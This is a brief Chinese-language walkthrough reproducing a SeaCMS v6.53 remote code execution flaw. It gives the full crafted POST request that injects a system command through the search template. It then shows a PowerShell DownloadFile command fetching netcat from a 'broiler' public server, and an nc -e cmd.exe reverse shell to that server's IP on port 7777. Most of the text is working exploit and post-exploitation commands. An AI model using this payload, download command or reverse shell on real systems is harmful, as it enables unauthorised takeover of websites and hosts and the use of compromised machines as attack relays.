海洋CMS复现

使用环境:

肉鸡服务器:103.229.126.201

攻击机:win7(192.168.72.130)

目标机:win7(192.168.72.129)+(seacms v6.53)

POC:

POST /seacms/upload/search.php HTTP/1.1

Host: 192.168.72.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://192.168.72.129/seacms/upload/

Content-Type: application/x-www-form-urlencoded

Content-Length: 217

Connection: close

Upgrade-Insecure-Requests: 1

 

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("ipconfig");


可以执行系统命令那好办

执行systeminfo查看系统信息如图:


发现是win7的系统,可以利用powershell传文件上去。

Powershell  (new-objectSystem.Net.WebClient).DownloadFile(‘http://www.xxx/xx’,’C:\xxx’ )

其中http://www.xxx/xx 是你公网肉鸡上你要传的文件

C:\xxx 为保存路径

利用这方法传了一个nc到目标机上。


执行nc:c:\system2003.exe 103.229.126.201 7777 -e c:\windows\system32\cmd.exe


在肉鸡上监听7777端口,并成功反弹了shell